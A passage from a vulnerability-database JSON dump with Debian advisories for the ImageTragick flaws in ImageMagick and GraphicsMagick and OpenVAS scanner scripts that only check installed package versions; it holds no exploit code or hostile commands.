and Stewie discovered\nseveral vulnerabilities in ImageMagick, a program suite for image\nmanipulation. These vulnerabilities, collectively known as ImageTragick,\nare the consequence of lack of sanitization of untrusted input. An\nattacker with control on the image input could, with the privileges of\nthe user running the application, execute code (CVE-2016-3714), make HTTP\nGET or FTP requests (CVE-2016-3718), or delete (CVE-2016-3715), move\n(CVE-2016-3716), or read (CVE-2016-3717) local files.\n\nThese vulnerabilities are particularly critical if Imagemagick processes\nimages coming from remote parties, such as part of a web service.\n\nThe update disables the vulnerable coders (EPHEMERAL, URL, MVG, MSL, and\nPLT) and indirect reads via /etc/ImageMagick-6/policy.xml file. In\naddition, we introduce extra preventions, including some sanitization for\ninput filenames in http/https delegates, the full remotion of PLT/Gnuplot\ndecoder, and the need of explicit reference in the filename for the\ninsecure coders.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 8:6.8.9.9-5+deb8u2.\n\nWe recommend that you upgrade your imagemagick packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-16T17:37:08", "type": "debian", "title": "[SECURITY] [DSA 3580-1] imagemagick security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2016-05-16T17:37:08", "id": "DEBIAN:DSA-3580-1:5A0E9", "href": "https://lists.debian.org/debian-security-announce/2016/msg00157.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-10T16:54:40", "description": "Version : 1.3.16-1.1+deb7u1\nCVE ID : CVE-2015-8808 CVE-2016-2317 CVE-2016-2318\n\t\t CVE-2016-3714 CVE-2016-3715 CVE-2016-3716\n CVE-2016-3717 CVE-2016-3718\nDebian Bug : 814732\n\nSeveral security vulnerabilities were discovered in graphicsmagick a\ntool to manipulate image files.\n\nGraphicsMagick is a fork of ImageMagick and also affected by\nvulnerabilities collectively known as ImageTragick, that are the\nconsequence of lack of sanitization of untrusted input. An attacker\nwith control on the image input could, with the privileges of the user\nrunning the application, execute code (CVE-2016-3714), make HTTP GET\nor FTP requests (CVE-2016-3718), or delete (CVE-2016-3715), move\n(CVE-2016-3716), or read (CVE-2016-3717) local files.\n\nTo address these concerns the following changes have been made:\n\n1. Remove automatic detection/execution of MVG based on file header or\n file extension.\n\n2. Remove the ability to cause an input file to be deleted based on a\n filename specification.\n\n3. Improve the safety of delegates.mgk by removing gnuplot support,\n removing manual page support, and by adding -dSAFER to all\n ghostscript invocations.\n\n4. Sanity check the MVG image primitive filename argument to assure\n that &quot;magick:&quot; prefix strings will not be interpreted. Please note\n that this patch will break intentional uses of magick prefix\n strings in MVG and so some MVG scripts may fail. We will search\n for a more flexible solution.\n\nIn addition the following issues have been fixed:\n\nCVE-2015-8808\n Assure that GIF decoder does not use unitialized data and cause an\n out-of-bound read.\n\nCVE-2016-2317 and CVE-2016-2318\n Vulnerabilities that allow to read or write outside memory bounds\n (heap, stack) as well as some null-pointer derreferences to cause a\n denial of service when parsing SVG files.\n\nFor Debian 7 &quot;Wheezy&quot;, these problems have been fixed in version\n1.3.16-1.1+deb7u1.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-21T18:51:57", "type": "debian", "title": "[SECURITY] [DLA 484-1] graphicsmagick security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8808", "CVE-2016-2317", "CVE-2016-2318", "CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2016-05-21T18:51:57", "id": "DEBIAN:DLA-484-1:5CC12", "href": "https://lists.debian.org/debian-lts-announce/2016/05/msg00037.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-22T13:25:16", "description": "Package : graphicsmagick\nVersion : 1.3.16-1.1+deb7u14\nCVE ID : CVE-2017-16669\n\n\nA remote denial of service vulnerability has been discovered in\ngraphicsmagick, a collection of image processing tools and associated\nlibraries.\n\nA specially crafted file can be used to produce a heap-based buffer\noverflow and application crash by exploiting a defect in the\nAcquireCacheNexus function in magick/pixel_cache.c.\n\nFor Debian 7 &quot;Wheezy&quot;, these problems have been fixed in version\n1.3.16-1.1+deb7u14.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nNote: The previous graphicsmagick package inadvertently introduced a\ndependency on liblcms2-2. This version of the package returns to using\nliblcms1. If your system does not otherwise require liblcms2-2, you\nmay want to consider removing it following the graphicsmagick upgrade.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\nAttachment:\nsignature.asc\nDescription: PGP signature\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-11-10T20:29:43", "type": "debian", "title": "[SECURITY] [DLA 1168-1] graphicsmagick security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-16669"], "modified": "2017-11-10T20:29:43", "id": "DEBIAN:DLA-1168-1:C7018", "href": "https://lists.debian.org/debian-lts-announce/2017/11/msg00013.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2020-01-29T20:09:22", "description": "Various security issues were discovered in Graphicsmagick, a collection\nof image processing tools. Heap-based buffer overflows or overreads may\nlead to a denial of service or disclosure of in-memory information or\nother unspecified impact by processing a malformed image file.", "cvss3": {}, "published": "2018-07-10T00:00:00", "type": "openvas", "title": "Debian LTS: Security Advisory for graphicsmagick (DLA-1401-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-13063", "CVE-2017-17915", "CVE-2017-17502", "CVE-2017-17498", "CVE-2017-14314", "CVE-2017-11636", "CVE-2017-17782", "CVE-2016-3716", "CVE-2017-17503", "CVE-2017-11643", "CVE-2016-5241", "CVE-2016-7447", "CVE-2017-17500", "CVE-2016-3718", "CVE-2017-13065", "CVE-2017-13134", "CVE-2016-7448", "CVE-2016-3717", "CVE-2017-16353", "CVE-2017-16669", "CVE-2017-14733", "CVE-2017-12937", "CVE-2017-17501", "CVE-2017-13064", "CVE-2017-17912", "CVE-2016-7446", "CVE-2016-7449"], "modified": "2020-01-29T00:00:00", "id": "OPENVAS:1361412562310891401", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891401", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891401\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\", \"CVE-2016-5241\", \"CVE-2016-7446\",\n \"CVE-2016-7447\", \"CVE-2016-7448\", \"CVE-2016-7449\", \"CVE-2017-11636\", \"CVE-2017-11643\",\n \"CVE-2017-12937\", \"CVE-2017-13063\", \"CVE-2017-13064\", \"CVE-2017-13065\", \"CVE-2017-13134\",\n \"CVE-2017-14314\", \"CVE-2017-14733\", \"CVE-2017-16353\", \"CVE-2017-16669\", \"CVE-2017-17498\",\n \"CVE-2017-17500\", \"CVE-2017-17501\", \"CVE-2017-17502\", \"CVE-2017-17503\", \"CVE-2017-17782\",\n \"CVE-2017-17912\", \"CVE-2017-17915\");\n script_name(\"Debian LTS: Security Advisory for graphicsmagick (DLA-1401-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-07-10 00:00:00 +0200 (Tue, 10 Jul 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2018/06/msg00009.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_tag(name:\"affected\", value:\"graphicsmagick on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n1.3.20-3+deb8u3.\n\nWe recommend that you upgrade your graphicsmagick packages.\");\n\n script_tag(name:\"summary\", value:\"Various security issues were discovered in Graphicsmagick, a collection\nof image processing tools. Heap-based buffer overflows or overreads may\nlead to a denial of service or disclosure of in-memory information or\nother unspecified impact by processing a malformed image file.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"graphicsmagick\", ver:\"1.3.20-3+deb8u3\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"graphicsmagick-dbg\", ver:\"1.3.20-3+deb8u3\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"graphicsmagick-imagemagick-compat\", ver:\"1.3.20-3+deb8u3\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"graphicsmagick-libmagick-dev-compat\", ver:\"1.3.20-3+deb8u3\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgraphics-magick-perl\", ver:\"1.3.20-3+deb8u3\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgraphicsmagick++1-dev\", ver:\"1.3.20-3+deb8u3\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgraphicsmagick++3\", ver:\"1.3.20-3+deb8u3\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgraphicsmagick1-dev\", ver:\"1.3.20-3+deb8u3\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgraphicsmagick3\", ver:\"1.3.20-3+deb8u3\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-01-29T20:09:20", "description": "The NSFocus Security Team discovered multiple security issues in\nGraphicsmagick, a collection of image processing tools. Several\nheap-based buffer over-reads may lead to a denial-of-service\n(application crash) or possibly have other unspecified impact when\nprocessing a crafted file.", "cvss3": {}, "published": "2018-01-09T00:00:00", "type": "openvas", "title": "Debian LTS: Security Advisory for graphicsmagick (DLA-1231-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-17915", "CVE-2017-17502", "CVE-2017-17498", "CVE-2017-17782", "CVE-2017-17503", "CVE-2017-17500", "CVE-2017-17501", "CVE-2017-17912"], "modified": "2020-01-29T00:00:00", "id": "OPENVAS:1361412562310891231", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891231", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891231\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2017-17498\", \"CVE-2017-17500\", \"CVE-2017-17501\", \"CVE-2017-17502\", \"CVE-2017-17503\", \"CVE-2017-17782\", \"CVE-2017-17912\", \"CVE-2017-17915\");\n script_name(\"Debian LTS: Security Advisory for graphicsmagick (DLA-1231-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-01-09 00:00:00 +0100 (Tue, 09 Jan 2018)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2018/01/msg00005.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n\n script_tag(name:\"affected\", value:\"graphicsmagick on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have been fixed in version\n1.3.16-1.1+deb7u16.\n\nWe recommend that you upgrade your graphicsmagick packages.\");\n\n script_tag(name:\"summary\", value:\"The NSFocus Security Team discovered multiple security issues in\nGraphicsmagick, a collection of image processing tools. Several\nheap-based buffer over-reads may lead to a denial-of-service\n(application crash) or possibly have other unspecified impact when\nprocessing a crafted file.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"graphicsmagick\", ver:\"1.3.16-1.1+deb7u16\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"graphicsmagick-dbg\", ver:\"1.3.16-1.1+deb7u16\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"graphicsmagick-imagemagick-compat\", ver:\"1.3.16-1.1+deb7u16\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"graphicsmagick-libmagick-dev-compat\", ver:\"1.3.16-1.1+deb7u16\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgraphics-magick-perl\", ver:\"1.3.16-1.1+deb7u16\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgraphicsmagick++1-dev\", ver:\"1.3.16-1.1+deb7u16\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgraphicsmagick++3\", ver:\"1.3.16-1.1+deb7u16\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgraphicsmagick1-dev\", ver:\"1.3.16-1.1+deb7u16\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgraphicsmagick3\", ver:\"1.3.16-1.1+deb7u16\", rls:\"DEB7\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-17T14:21:46", "description": "This host is installed with GraphicsMagick\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2017-02-21T00:00:00", "type": "openvas", "title": "GraphicsMagick Multiple Vulnerabilities-01 Feb17 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7447", "CVE-2016-7448", "CVE-2016-7446", "CVE-2016-7449"], "modified": "2019-07-05T00:00:00", "id": "OPENVAS:1361412562310810560", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810560", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# GraphicsMagick Multiple Vulnerabilities-01 Feb17 (Windows)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:graphicsmagick:graphicsmagick\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810560\");\n script_version(\"2019-07-05T10:41:31+0000\");\n script_cve_id(\"CVE-2016-7446\", \"CVE-2016-7447\", \"CVE-2016-7448\", \"CVE-2016-7449\");\n script_bugtraq_id(93074);\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 10:41:31 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-02-21 10:39:33 +0530 (Tue, 21 Feb 2017)\");\n script_name(\"GraphicsMagick Multiple Vulnerabilities-01 Feb17 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with GraphicsMagick\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists as,\n\n - The TIFF reader had a bug pertaining to use of 'TIFFGetField' function when\n a 'count' value is returned.\n\n - The Utah RLE reader did not validate that header information was\n reasonable given the file size.\n\n - A heap overflow error in the 'EscapeParenthesis' function.\n\n - A buffer overflow error in the MVG and SVG rendering code.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to cause a heap read overflow which could allow an untrusted file to\n crash the software, cause huge memory allocations and/or consume huge amounts\n of CPU, cause a denial of service and to have some unspecified impacts.\");\n\n script_tag(name:\"affected\", value:\"GraphicsMagick version before 1.3.25\n on Windows\");\n\n script_tag(name:\"solution\", value:\"Upgrade to GraphicsMagick version 1.3.25\n or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://blogs.gentoo.org/ago/2016/08/23/graphicsmagick-two-heap-based-buffer-overflow-in-readtiffimage-tiff-c\");\n script_xref(name:\"URL\", value:\"https://blogs.gentoo.org/ago/2016/09/07/graphicsmagick-null-pointer-dereference-in-magickstrlcpy-utility-c\");\n script_xref(name:\"URL\", value:\"http://www.openwall.com/lists/oss-security/2016/09/18/8\");\n script_xref(name:\"URL\", value:\"http://seclists.org/oss-sec/2016/q3/550\");\n\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_graphicsmagick_detect_win.nasl\");\n script_mandatory_keys(\"GraphicsMagick/Win/Installed\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!gmVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:gmVer, test_version:\"1.3.25\"))\n{\n report = report_fixed_ver(installed_version:gmVer, fixed_version:\"1.3.25\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-03-17T22:56:18", "description": "The remote host is missing an update announced via the referenced Security Advisory.", "cvss3": {}, "published": "2016-10-26T00:00:00", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2016-752)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7447", "CVE-2016-7448", "CVE-2016-7446", "CVE-2016-7449"], "modified": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562310120741", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120741", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120741\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2016-10-26 15:38:27 +0300 (Wed, 26 Oct 2016)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2016-752)\");\n script_tag(name:\"insight\", value:\"A possible heap overflow was discovered in the EscapeParenthesis() function (CVE-2016-7447 ).Various issues were found in the processing of SVG files in GraphicsMagick (CVE-2016-7446 ).The TIFF reader had a bug pertaining to use of TIFFGetField() when a 'count' value is returned. The bug caused a heap read overflow (due to using strlcpy() to copy a possibly unterminated string) which could allow an untrusted file to crash the software (CVE-2016-7449 ).The Utah RLE reader did not validate that header information was reasonable given the file size and so it could cause huge memory allocations and/or consume huge amounts of CPU, causing a denial of service (CVE-2016-7448 )\");\n script_tag(name:\"solution\", value:\"Run yum update GraphicsMagick to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2016-752.html\");\n script_cve_id(\"CVE-2016-7447\", \"CVE-2016-7446\", \"CVE-2016-7449\", \"CVE-2016-7448\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"GraphicsMagick-c++-devel\", rpm:\"GraphicsMagick-c++-devel~1.3.25~1.9.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"GraphicsMagick-devel\", rpm:\"GraphicsMagick-devel~1.3.25~1.9.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"GraphicsMagick\", rpm:\"GraphicsMagick~1.3.25~1.9.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"GraphicsMagick-c++\", rpm:\"GraphicsMagick-c++~1.3.25~1.9.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"GraphicsMagick-perl\", rpm:\"GraphicsMagick-perl~1.3.25~1.9.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"GraphicsMagick-debuginfo\", rpm:\"GraphicsMagick-debuginfo~1.3.25~1.9.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"GraphicsMagick-doc\", rpm:\"GraphicsMagick-doc~1.3.25~1.9.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-01-23T16:32:37", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Ubuntu Update for graphicsmagick USN-4248-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-17783", "CVE-2017-17502", "CVE-2017-17498", "CVE-2017-17782", "CVE-2017-17503", "CVE-2017-16547", "CVE-2017-17500", "CVE-2017-16669", "CVE-2017-16545", "CVE-2017-17501"], "modified": 